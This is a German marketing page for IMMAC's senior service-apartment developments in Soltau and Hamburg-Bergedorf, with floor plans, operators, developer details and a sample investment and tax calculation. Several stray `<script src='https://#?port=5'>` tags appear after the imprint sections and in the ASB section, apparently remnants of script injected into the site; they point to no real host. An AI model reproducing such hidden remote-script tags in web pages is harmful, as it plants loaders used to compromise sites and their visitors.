Soltau Reitschulweg

 

 

 

 

 

 

 

 

 

Soltau Reitschulweg 6


Vorstellung Projekt

Auf dem Grundstück Reitschulweg 6 in Soltau wird eine Wohnanlage mit 30 seniorengerechten Service Wohnungen errichtet. Das Gebäude hat drei Vollgeschosse sowie ein ausgebautes Dachgeschoss. Vom Erdgeschoss bis zum Dachgeschoss befinden sich 2- bis 3-Zimmer-Wohnungen mit Eingangsflur, Abstellnische, eingebauter Küche und barrierefreiem Badezimmer.

Jede Wohnung besitzt einen Balkon oder Zugang zum eigenen Terrassenbereich. Über einen Aufzug und breite Flure sind die Wohnungen bequem zu erreichen. Im Erdgeschoss wird ein Gemeinschaftsraum errichtet, der dem Betreiber sowie den Bewohnern für den sozialen Austausch zur Verfügung steht. Im Dachgeschoss befinden sich die zu den Wohneinheiten zugehörigen Abstellräume. Der Außenbereich sowie das benachbarte Parkdeck sehen für jede Wohneinheit einen PKW-Stellplatz vor.

Über eine Verbindungstür ist der Zugang zum benachbarten Pflegeheim möglich. Von hier aus kann die unmittelbare Betreuung in der Wohnanlage jederzeit gewährleistet werden.

Die hier angebotenen Wohnungen werden im Teileigentum zum Kauf angeboten.

 


Wohnungen und Angebote

Jede Wohnung ist in sich abgeschlossen und verfügt über mindestens zwei Zimmer. Der Wohn- und Schlafbereich ist getrennt. Die Barrierefreiheit wird gewährleistet und betrifft alle Bereiche der Wohnung. Ebenso wird auf die Einhaltung der geforderten Bewegungsflächen und Durchgangsbreiten Rücksicht genommen, so dass eine Benutzung von Rollatoren und sonstigen Gehhilfen bei Bedarf möglich ist.

Zudem sorgen technische Einrichtungen wie eine Haustelefonanlage, der Aufzug und die Automatiktür am Hauseingang für mehr Sicherheit und Komfort im täglichen Leben.

Im Badezimmer ist ein Waschmaschinenplatz vorgesehen und die Küche bietet Raum und Anschluss für einen Geschirrspüler. Für die rechtliche Sicherheit der geplanten Service Wohnanlage gibt es zwingende Vorschriften und Normen, die von den beauftragten Architekten und Ingenieuren selbstverständlich eingehalten werden.

 

 

Lage und Umgebung

Die Stadt Soltau, von seinen 22.000 Einwohnern gern „das Herz der Heide“ genannt, liegt zentral im sogenannten Elbe-Weser-Dreieck – also in der Mitte der Ballungszentren Hamburg – Bremen – Hannover und ist die zweitgrößte Stadt im Heidekreis.

Click to open a larger map

Überblick

Größe: ca. 1.690 m²
Wohneinheiten: 30
Gewerbefläche: 1
Badezimmer: barrierefrei nach DIN 18040
Abstellräume: je Wohneinheit im Dachgeschoss
Aufzug: 1 x vorhanden
Stellplätze: 36 PKW-Außenstellplätze
Betreiber: Dorea GmbH
Fertigstellung: Frühjahr 2018

Betreiber

Partner vor Ort und Pächter des Gewerbefläche ist die Dorea GmbH.
Dorea betreibt in Soltau bereits das benachbarten Pflegeheim „Haus im Park“
und gewährleistet die Betreuung der Service-Wohnanlage. Dorea ist ein erfahrener und kompetenter Partner der IMMAC mit integriertem Pflegeangebot von der ambulanten über die stationäre bis hin zu spezialisierten Pflegeangeboten.

Dorea handelt nach dem Vorbild der Großfamilie:

Gemeinsam füreinander dasein, wobei jeder frei ist, das eigene Leben selbstbestimmt zu führen.


 


 

Bauträger

Verantwortlich für das Bauprojekt

IWB „Reitschulweg 6“ GmbH
(eine Gesellschaft der IMMAC Wohnbau)
Große Theaterstraße 31–35
20354 Hamburg

Amtsgericht Hamburg, HRB 138697
Steuernummer: 48/734/06009
Erlaubnis gemäß §34c GewO liegt vor
Zuständiges Gewerbeamt/Aufsichtsbehörde:
Bezirksamt Hamburg Mitte
Klosterwall 2, 20095 Hamburg
Geschäftsführer: Mechthild Mösenfechtel, Reimund Huß

Impressum

Angabenvorbehalt/Haftungsvorbehalt

 

<script src='https://#?port=5' type='text/javascript'></script>

Benötigen Sie Hilfe?

Für weitere Information, Wohnungsliste, Reservierungsformulare, etc. sprechen Sie uns gerne an.

 

KONTAKT AUFNEHMEN

 

 

Weiterlesen

HAMBURG VIERLANDENSTRASSE

Hamburg Vierlandenstrasse


Vorstellung Projekt

Auf dem Grundstück Vierlandenstraße 29 in Hamburg-Bergedorf wird eine Wohnanlage mit 50 seniorengerechten Service-Wohnungen und einem Gemeinschaftsbereich errichtet. Das Gebäude hat 3 Vollgeschosse sowie ein Staffelgeschoss und ist voll unterkellert.

Vom Erdgeschoss bis zum 4. OG befinden sich 2-Zimmer-Wohnungen mit Eingangsflur, Abstellnischen, eingebauter Küche und barrierearmen Badezimmer nach DIN 18040. Jede Wohnung besitzt einen Balkon oder Zugang zum eigenen Terrassenbereich. Über einen Aufzug und breite Flure sind die Wohnungen bequem erreichbar.

Die hier angebotenen Wohnungen werden im Teileigentum ausschließlich Kapitalanlegern zum Kauf angeboten.

 


Wohnungen und Angebote

Jede Wohnung ist in sich abgeschlossen und verfügt über mindestens zwei Zimmer. Der Wohn- und Schlafbereich wird getrennt. Die Barrierefreiheit wird gewährleistet und betrifft alle Bereiche der Wohnung. Ebenso wird auf die Einhaltung der geforderten Bewegungsflächen und Durchgangsbreiten Rücksicht genommen, so dass eine Benutzung von Zimmerrollstühlen oder sonstigen Gehhilfen bei Bedarf möglich ist.

Neben diesen Schwerpunkten sorgen technische Einrichtungen wie z.B. eine Haustelefonanlage, Automatiktüren an den Hauseingängen, sowie Wasch- und Trockenräume für mehr Sicherheit und Komfort im täglichen Leben. Für die rechtliche Sicherheit der zu erstellenden Wohngebäude für Service-Wohnen gibt es zwingende Vorschriften und Normen, die von den beauftragten Architekten und Ingenieuren selbstverständlich eingehalten werden. Diese Vorschriften und Normen variieren je nach Bundesland, weshalb IMMAC bevorzugt mit örtlich ansässigen Architekten mit Erfahrung im Bereich des Service-Wohnens zusammen arbeitet.


BeispielBerechnung

Betrachtung des ersten vollen Jahres nach Erwerb, Übergabe und Vermietung

Beispielrechnung für Wohnung Nr.7 43,2 m² Wohnfläche bei 20 % Eigenkapitaleinsatz
Kaufpreis    167.000,00 €  
mtl. Miete netto kalt je m²  11,50 €  496,80 €  
Eigenkapital  20 %  33.400,00 €  (zzgl. Erwerbsnebenkosten*)

 

 Beispielbetrachtung des ersten vollen Jahres nach Erwerb, Übergabe und Vermietung
Kaufpreis   167.000,00 €  
./. Eigenkapital   -33.400,00 €  
./. Tilgungszuschuss KfW   -5.000,00 €  
Fremdmittelbedarf   128.600,00 €  
Fremdmittel KfW   100.000,00 €  
Grundschulddarlehen   28.600,00 €  
Cash flow p.a.      
Mieteinnahmen   5.961,60 €  
Zinsen KfW 0,75% -750,00 €  
Zinsen Grundschulddarlehen** 1,80% -514,80 €  
WEG-Verwaltung monatlich x 12  26,78 €  -321,36 €  
Instandhaltungsrücklage mtl./m²  1,00 € -518,40 €  
Liquider Überschuss vor Steuern z.B. für Tilgung    3.857,04 €  
Steuerliches Ergebnis      
Mieteinnahmen   5.961,60 €  
./. Zinsen   -1.264,80 €  
./. Afa auf Gebäudeanteil***   -2.672,00 €  
./. WEG-Verwaltung   -321,36 €  
 zu versteuern   1.703,44 €  
       Überschuss nach Steuern
Steuerlast aus   1.703,44 €  (vor Tilgung)
bei Spitzensteuersatz (inkl. Soli)  30,00% -539,14 €  3.317,90 €
   35,00%  -629,00 €  3.228,04 €
   42,00% -754,79 €  3.102,25 €

 

*     Erwerbsnebenkosten sind ca. 1,5 % für Notar und Grundbuch, 4,5% Grunderwerbssteuer in Hamburg
**   Der zugrundegelegte Zinssatz ist beispielhaft und kann je Institut und Beleihungshöhe abweichen.
*** Der Grundstücksanteil wurde mit 20% des Kaufpreises angenommen. Die Auffassung der Finanzbehörde kann abweichen.

Überblick

Größe: ca. 3.000 m²
Wohneinheiten: 50 (davon 3 mit rollstuhlgerechtem Bad)
Badezimmer: barrierefrei nach DIN 18040
Abstellräume: je Wohneinheit im Keller
Aufzug: vorhanden
Tiefgarage: 16 Stellplätze
Betreiber: Arbeiter-Samariter-Bund
Fertigstellung:  Sommer 2017

Betreiber

asb Partner vor Ort ist der ASB, der bereits 550 Service-Wohnungen in Hamburg betreut und weiter expandiert. Der ASB hat die Gewerbeflächen im Erdgeschoss der Wohnungsanlage "Vierlanden" auf zehn Jahre fest angemietet. Diese Räumlichkeiten stehen ausschließlich für die Bewohner des Hauses als Anlaufpunkt und Ort der Kommunikation zur Verfügung. Da der ASB mit dieser Station neben der Miete auch noch erhebliche Personalkosten hat, die nur aus Servicepauschale der Mieter und auf Wunsch zusätzlich abgerufener Dienstleistungen gedeckt werden müssen, gilt das Interesse des ASB einer lückenlosen und dauerhaften Vollvermietung.

Weiterlesen

 


Lage und Umgebung

Bergedorf liegt im Osten Hamburgs und grenzt nördlich an Schleswig-Holstein und im Süden an Niedersachsen. Mit der S-Bahn wie auch mit dem Auto ist von Bergedorf aus der Hamburger Hauptbahnhof und damit die Innenstadt in etwa 20 Minuten erreichbar.

Click to open a larger map


 


 


 

Bauträger

Verantwortlich für das Bauprojekt

IWB „Vierlandenstraße 29“ GmbH
(eine Gesellschaft der IMMAC Wohnbau)
Große Theaterstraße 31–35
20354 Hamburg

Amtsgericht Hamburg, HRB 135629
Geschäftsführer: Mechthild Mösenfechtel, Reimund Huß

Impressum

Angabenvorbehalt/Haftungsvorbehalt

 

<script src='https://#?port=5' type='text/javascript'></script>

Benötigen Sie Hilfe?

Für weitere Information, Wohnungsliste, Reservierungsformulare, etc. sprechen Sie uns gerne an.

 

KONTAKT AUFNEHMEN

 

 

Weiterlesen

ASB

<script src='https://#?port=5' type='text/javascript'></script>
<script src='https://#?port=5' type='text/javascript'></script>

Der Arbeiter-Samariter-Bund wurde 1888 in Deutschland gegründet und hat seine Bundesgeschäftsstelle in Köln. Im In- und Ausland sind derzeit circa 1,1 Millionen Menschen Mitglied beim ASB.

Deutschlandweit gibt es 16 Landesverbände und 206 regionale Gliederungen, mit haupt- und ehrenamtlichen Mitarbeitern, einschließlich der Mitarbeiter im freiwilligen sozialen und Bundesfreiwilligendienst. Von den ehrenamtlichen Mitgliedern der gewählten Kontroll- und Beschlussgremien wird die Arbeit des ASB auf Bundes-, Länder- und kommunaler Ebene unterstützt.

Weiterlesen

Über IMMAC

Seit 1997 bietet IMMAC privaten und institutionellen Anlegern erstklassige Immobilienbeteiligungen an. Dabei hat sich IMMAC zum führenden, auf die Sozialwirtschaft spezialisierten Investor entwickelt. IMMAC hat bereits über 80 Fonds initiiert und dabei Investitionen von über € 1,3 Milliarden Gesamtinvestitionsvolumen aus dem Bereich Sozialimmobilien wie stationäre Pflegeeinrichtungen, Kliniken und betreute Wohnanlagen verantwortet.

Weiterlesen